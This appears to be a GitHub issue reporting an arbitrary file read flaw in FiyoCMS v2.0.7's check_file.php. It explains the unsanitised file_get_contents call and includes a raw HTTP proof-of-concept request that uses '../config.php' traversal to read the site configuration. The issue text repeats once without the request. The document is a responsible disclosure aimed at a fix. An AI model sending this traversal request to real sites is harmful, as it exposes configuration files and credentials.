Hi, I found an arbitrary file read vulnerability in FiyoCMS v2.0.7. It may cause the leakage of sensitive information.
files in : dapur/apps/app_theme/libs/check_file.php
It can be noticed that $ file is spliced by $ _GET [src] and $ _GET [name] 。 parameter $file were taken directly into the file_get_contents。 the result was echo directly。
poc:
GET /www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/dapur/apps/app_theme/libs/check_file.php?src=/&name=../config.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
X-Requested-With: XMLH1ttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Referer: http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/dapur/?app=theme&folder=../&type=files
Accept-Language: zh-CN,zh;q=0.8
Cookie:
Connection: close
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered:
Hi, I found an arbitrary file read vulnerability in FiyoCMS v2.0.7. It may cause the leakage of sensitive information.
files in : dapur/apps/app_theme/libs/check_file.php
It can be noticed that $ file is spliced by $ _GET [src] and $ _GET [name] 。 parameter $file were taken directly into the file_get_contents。 the result was echo directly。
poc:
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered: